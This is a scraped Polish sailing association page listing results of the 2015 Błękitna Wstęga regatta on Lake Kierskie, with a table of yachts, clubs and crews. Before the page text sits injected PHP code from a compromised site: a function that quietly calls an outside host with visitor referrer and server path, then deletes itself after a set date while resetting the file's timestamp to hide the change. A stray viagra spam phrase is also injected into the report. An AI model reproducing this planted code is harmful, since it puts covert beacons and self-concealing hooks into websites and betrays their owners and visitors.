check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Błękitna Wstęga Jeziora Kierskiego 2015 - Wyniki

Witamy na stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Klasyfikacja Jachtów Turystycznych Błękitna Wstęga Jeziora Kierskiego 2015 - Wyniki

W dniu 17.10.br odbyły się ostatnie regaty żeglarskie na jeziorze kierskim. Jak co roku regaty zakończenia sezonu to american viagra company Błękitna Wstęga Jeziora Kierskiego (jeden wyścig wszystkich jachtów jednokadłubowych). W tym roku regaty odbyły się pod patronatem targów BOATEX. W regatach wzięło udział 23 jachty i ponad 60-ciu zawodników. Uroczyste zakończenie regat odbędzie się na terenie MTP podczas targów BOATEX które odbędą się w dniach 12-14.02.2016r.

WOZŻ Dariusz SIBILSKI”

Zapraszamy do zapoznania się z wynikami regat proszę kliknąć [Więcej...]
lub link z wynikami regat: Błękitna Wstęga Jeziora Kierskiego 2015    

 Błękitna Wstęga Jeziora Kierskiego

              WYNIKI REGAT - BŁĘKITNA WSTĘGA JEZIORA KIERSKIEGO 2015 

Lp.

Nazwa jachtu

Nr jachtu

Klub

Sternik

Załoga

Miejsce

1

INDYGO

POL 9

JKW

PIOTR KOWALEWSKI

RAFAŁ TRZCIŃSKI JUREK DOMAŃSKI

1

2

CHOCOLISSIMO GANG

POL 27

JKW

MARIUSZ TRZCIŃSKI

DAMIAN DĘBICKI BŁAŻEJ ŁUKOMSKI PAWEŁ KURZAWA

2

3

CYAN  JERRY

POL 6646

JKW

JERZY WOJTERA

SZYMON ŚLÓSARSKI DAMIAN WYSZ

3

4

HASTA LA VISTA

POL 36

RJKP

MATEUSZ GOŁĄB

DOROTA GOLDER-GOŁĄB

4

5

KOŁOBRZEG

 

AZS POZNAŃ

MIECZYSŁAW POPŁONYK

RAFAŁ WITT ANNA SZYFTER WŁADYSŁAW KONDEJ ŁUKASZ RUMATOWSKI BARTEK WITT

5

6

SIGMA ACTIVE

POL 7

RJKP

MACIEJ KAMIŃSKI

MAREK KAMIŃSKI

6

7

PRO FIZJO

 

RJKP

MICHAŁ PASICIEL

EWA CHMIELNIK KUBA TEUSCHNER

7

8

REPUBLIKA 2 49-ER

 

SZKWAŁ

WOJCIECH AUGUSTYNIAK

MICHAŁ CZEKALSKI

8

9

WAGABUNDA

POL  21

WAGABUNDA

MARCIN BATKO

JACEK JAŃCZAK

9

10

OMEGA

PZ 9

KS POSNANIA

JANUSZ KOKORNIAK

MARCIN MATYSKA

10

11

CHAOS

POL 33

JKW

MACIEJ JANKOWSKI

KAROL BĄK MICHAŁ LENKIEWICZ PIOTR MISIAK

11

12

CHERRY

PO 376

JKW

WOJCIECH NOWAK

HENRYK BEREŚ

12

13

FINN

POL 41

AZS POZNAŃ

STANISŁAW DUBANIEWICZ

 

13

14

PIRATKA

PZ 104

JKW

KRZYSZTOF SIWIEC

DARIUSZ KURKIEWICZ ŁUKASZ KWIATKOWSKI

14

15

WEGA

KŻ UAM

KŻ UAM

MARIANNA MACIEJEWSKA

JULIANNA MACIEJEWSKA RADOSŁAW MARCINKOWSKI

15

16

LASER ST

POL

ŻLKS

BARTOSZ KOWALCZYK

 

16

17

BEZ 4

P 31

KS POSNANIA

KAROL TOMASZEWSKI

ŁUKASZ PYKA

17

18

CZARNA ROZPACZ

 

PKM LOK

TOMASZ SZUWALSKI

NATALIA WOŹNIAK

18

19

MAK 707

PZ 99

RJKP

WŁADYSŁAW SOBAŃSKI

ROMAN KRAUSE

19

20

NOLA SAS 620

 

SZKWAŁ

MARCIN PINCZYŃSKI

KAROL WITKOWSKI

20

21

BLASK ORIONA

PO 1119

WAGABUNDA

ROBERT UNRUH

ALEKSANDER UNRUH

21

22

ZORRO

PO 1828

JKW

GRZEGORZ WAWRZYNIAK

TOMASZ HERWART ANDRZEJ BRZÓSKA

22

23

DERIVEUR PIAF 585

 

 

SEBASTIAN BACHORZ

 

23

Błękitna Wstęga Jeziora Kierskiego

Błękitna Wstęga Jeziora Kierskiego

Błękitna Wstęga Jeziora Kierskiego